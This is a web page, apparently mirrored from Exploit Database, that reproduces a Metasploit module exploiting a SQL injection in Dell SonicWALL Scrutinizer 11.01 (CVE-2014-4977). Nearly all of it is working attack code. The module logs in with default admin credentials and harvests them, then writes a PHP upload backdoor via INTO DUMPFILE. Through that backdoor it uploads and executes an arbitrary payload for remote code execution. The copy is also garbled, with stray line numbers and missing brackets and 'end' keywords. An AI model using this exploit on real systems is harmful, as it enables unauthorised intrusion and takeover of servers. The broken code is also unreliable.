Dell SonicWALL Scrutinizer 11.01 – methodDetail SQL Injection (Metasploit)

Exploit Database
104 阅读

作者： Metasploit

日期： 2016-05-17
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/39836/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

372

373

374

375

376

377

378

379

380

381

382

383

384

385

386

387

388

389

390

391

392

393

394

395

396

397

398

399

400

401

402

403

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::FileDropper

include Msf::Exploit::EXE

WINDOWS = /^win/i

LINUX = /linux/i

def initialize(info={})

super(update_info(info,

'Name' => "Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection",

'Description'=> %q{

This module exploits a vulnerability found in Dell SonicWALL Scrutinizer. The methodDetail

parameter in exporters.php allows an attacker to write arbitrary files to the file system

with an SQL Injection attack, and gain remote code execution under the context of SYSTEM

for Windows, or as Apache for Linux.

Authentication is required to exploit this vulnerability, but this module uses

the default admin:admin credential.

'License'=> MSF_LICENSE,

'Author' =>

[

'bperry', # Original discovery, PoC, and Metasploit module

'sinn3r'# Metasploit module for native support

'References' =>

[

[ 'CVE', '2014-4977' ],

[ 'BID', '68495' ],

[ 'URL', 'http://seclists.org/fulldisclosure/2014/Jul/44' ],

[ 'URL','https://gist.github.com/brandonprry/76741d9a0d4f518fe297' ]

'Arch' => [ ARCH_X86 ],

'Platform' => [ 'win', 'linux' ],

'Targets'=>

[

[ 'Automatic', {} ],

[

'Dell SonicWALL Scrutinizer 11.01 on Windows',

{

'Arch' => ARCH_X86,

'Platform' => 'win',

}

[

'Dell SonicWALL Scrutinizer 11.01 Linux Appliance',

{

'Arch' => ARCH_X86,

'Platform' => 'linux'

}

]

'Privileged' => false,

'DisclosureDate' => 'Jul 24 2014',

'DefaultTarget'=> 0))

register_options(

[

OptString.new('TARGETURI', [ true, "Base Application path", "/" ]),

OptString.new('USERNAME', [ true,'The username to authenticate as', 'admin' ]),

OptString.new('PASSWORD', [ true,'The password to authenticate with', 'admin' ])

], self.class)

end

# Prints a message with the target's IP and port.

# @param msg [String] Message to print.

# @return [void]

def print_status(msg='')

super("#{peer} - #{msg}")

end

# Prints an error message with the target's IP and port.

# @param msg [String] Message to print.

# @return [void]

def print_error(msg='')

super("#{peer} - #{msg}")

end

# Pads NULL columns for a SQL injection string.

# @param n [Fixnum] Number of nulls

# @return [String]

def pad_null(n)

padding = []

n.times do

padding << 'NULL'

end

padding * ','

end

# Checks (explicitly) the target for the vulnerability. To be able to check this, a

# valid username/password is required.

# @return [void]

def check

begin

res = do_login

rescue Msf::Exploit::Failed => e

vprint_error(e.message)

return Exploit::CheckCode::Unknown

end

uid = res['userid']

sid = res['sessionid']

pattern = Rex::Text.rand_text_alpha(10)

sqli_str = "-6045 UNION ALL SELECT '#{pattern}',#{pad_null(19)}"

res = do_sqli(sqli_str, sid, uid).get_json_document

return Exploit::CheckCode::Vulnerable if res['id'].to_s == pattern

Exploit::CheckCode::Safe

end

# Returns the OS information by using @@version_compile_os.

# @param sid [String] Session ID.

# @param uid [String] User ID.

# @return [String] The OS information.

def get_os(sid, uid)

sqli_str = "-6045 UNION ALL SELECT @@version_compile_os,#{pad_null(19)}"

res = do_sqli(sqli_str, sid, uid).get_json_document

res['id']

end

# Returns target's d4d directory path that will be used to upload our malicious files.

# @param os [String] OS information.

# @return [String]

def get_d4d_path(os)

case os

when WINDOWS

# On Windows, the full d4d path looks something like this:

# C:\Program Files\Scrutinizer\html\d4d

'../../html/d4d'

when LINUX

# On the Linux appliance, the d4d path looks exactly like this:

'/home/plixer/scrutinizer/html/d4d'

end

# Logs into Dell SonicWALL Scrutinizer.

# @return [Hash] JSON response.

def do_login

res = send_request_cgi({

'uri' => normalize_uri(target_uri, '/cgi-bin/login.cgi'),

'vars_get' => {

'name' => datastore['USERNAME'],

'pwd' => datastore['PASSWORD']

}

})

unless res

fail_with(Failure::Unknown, 'The connection timed out while attempting to log in.')

end

res = res.get_json_document

if res['noldapnouser']

fail_with(Failure::NoAccess, "Username '#{datastore['USERNAME']}' is incorrect.")

elsif res['loginfailed']

fail_with(Failure::NoAccess, "Password '#{datastore['PASSWORD']}' is incorrect.")

end

report_cred(datastore['USERNAME'], datastore['PASSWORD'])

res

end

# Saves a valid username/password to database.

# @param username [String]

# @param password [String]

# @return [void]

def report_cred(username, password)

service_data = {

address: rhost,

port: rport,

service_name: ssl ? 'https' : 'http',

protocol: 'tcp',

workspace_id: myworkspace_id

}

credential_data = {

module_fullname: self.fullname,

origin_type: :service,

username: username,

private_data: password,

private_type: :password

}.merge(service_data)

credential_core = create_credential(credential_data)

login_data = {

core: credential_core,

last_attempted_at: DateTime.now,

status: Metasploit::Model::Login::Status::SUCCESSFUL

}.merge(service_data)

create_credential_login(login_data)

end

# Injects malicious SQL string to the methodDetail parameter against the target machine.

# @param method_detail [String] Malicious SQL injection string.

# @param sid [String] Session ID.

# @param uid [String] User ID.

# @return [Rex::Proto::Http::Response]

def do_sqli(method_detail, sid, uid)

res = send_request_cgi({

'uri'=> normalize_uri(target_uri, '/d4d/exporters.php'),

'vars_get' => { 'methodDetail'=> method_detail },

'cookie' => "cookiesenabled=1;sessionid=#{sid};userid=#{uid}"

})

unless res

fail_with(Failure::Unknown, 'The connection timed out for exporters.php.')

end

res

end

# Returns a PHP backdoor that is to be uploaded onto the target machine.

# @param os [String] Target OS information.

# @param target_path [String]

# @return [String] PHP backdoor

def get_php_backdoor(os)

case os

when WINDOWS

chmod_code = %Q|chmod($bname, 0777);|

exec_code = %Q|exec($bname);|

when LINUX

chmod_code = %Q|chmod("./" . $bname, 0777);|

exec_code = %Q|exec("./" . $bname);|

end

%Q|<?php

$bname = basename( $_FILES['uploadedfile']['name']);

$target_path = "./" . $bname;

move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path);

#{chmod_code}

#{exec_code}

|.gsub(/\x20{4}/, ' ')

end

# Uploads the executable payload via malicious PHP backdoor.

# @param backdoor_fname [String] Name of the backdoor

# @param payload_fname [String] Name of the executable payload

# @return [void]

def upload_payload(backdoor_fname, payload_fname)

p = generate_payload_exe(

code: payload.encoded,

platform: @my_target.platform,

arch: @my_target.arch

)

print_status("Uploading #{payload_fname} (#{p.length} bytes)...")

post_data = Rex::MIME::Message.new

post_data.add_part(

'application/octet-stream',

'binary',

"form-data; name=\"uploadedfile\"; filename=\"#{payload_fname}\""

)

data = post_data.to_s

res = send_request_cgi({

'method' => 'POST',

'uri'=> normalize_uri(target_uri, "/d4d/#{backdoor_fname}"),

'ctype'=> "multipart/form-data; boundary=#{post_data.bound}",

'data' => data

})

unless res

# Here we are not using fail_with, because when we get a session, it seems to be creating

# the same effect as connection hanging... and then eventually times out. If that

# happens, a fail_with() can cause msfconsole to believe there is no session created.

vprint_status('Connection timed out while uploading payload.')

return

end

if res.code == 404

fail_with(Failure::Unknown, "Server returned 404 for #{backdoor_fname}.")

end

# Uploads the PHP backdoor onto the target machine. The reason of using a PHP backdoor to upload

# is because our SQL injection is in a GET method, and Apache has a max length of 8190 bytes,

# which is bad for some built-in or custom payloads.

# @param opts [Hash]

# @option opts [String] :d4d_path

# @option opts [String] :backdoor_fname

# @option opts [String] :payload_fname

# @option opts [String] :sid

# @option opts [String] :uid

# @option opts [String] :os

# @return [void]

def upload_php_backdoor(opts)

d4d_path = opts[:d4d_path]

backdoor_fname = opts[:backdoor_fname]

payload_fname= opts[:payload_fname]

sid= opts[:sid]

uid= opts[:uid]

os = opts[:os]

print_status("Injecting a PHP upload backdoor (#{backdoor_fname})...")

hex_backdoor = get_php_backdoor(os).unpack("H*")[0]

sqli_str = "-6045 UNION ALL SELECT 0x#{hex_backdoor},#{pad_null(19)} INTO DUMPFILE '#{d4d_path}/#{backdoor_fname}' #"

do_sqli(sqli_str, sid, uid)

end

# Attempts a SQL injection attack against the target machine.

# @param os [String] OS information.

# @param sid [String] Session ID.

# @param uid [String] User ID.

# @return [void]

def do_backdoor_sqli(os, sid, uid)

backdoor_fname = "#{Rex::Text.rand_text_alpha(6)}.php"

payload_fname= Rex::Text.rand_text_alpha(5)

payload_fname << '.exe' if @my_target['Platform'].match(WINDOWS)

d4d_path = get_d4d_path(os)

register_files_for_cleanup(backdoor_fname, payload_fname)

opts = {

d4d_path: d4d_path,

backdoor_fname: backdoor_fname,

payload_fname: payload_fname,

sid: sid,

uid: uid,

os: os

}

upload_php_backdoor(opts)

upload_payload(backdoor_fname, payload_fname)

end

# Tries to set the target. If the user manually set one, then avoid automatic target.

# @param os [String] OS information.

# @return [void]

def try_set_target(os)

@my_target = target if target != targets[0]

case os

when WINDOWS

@my_target = targets[1]

when LINUX

@my_target = targets[2]

else

fail_with(Failure::NoTarget, 'Unsupported target')

end

# Exploits the target machine. To do this, first we must log into the system in order to obtain

# the user ID and session ID. After logging in, we can ask the vulnerable code to upload a

# malicious PHP backdoor, and then finally use that backdoor to upload and execute our payload.

def exploit

res = do_login

uid = res['userid']

sid = res['sessionid']

os = get_os(sid, uid)

print_status("Detected OS information: #{os}")

try_set_target(os)

do_backdoor_sqli(os, sid, uid)

end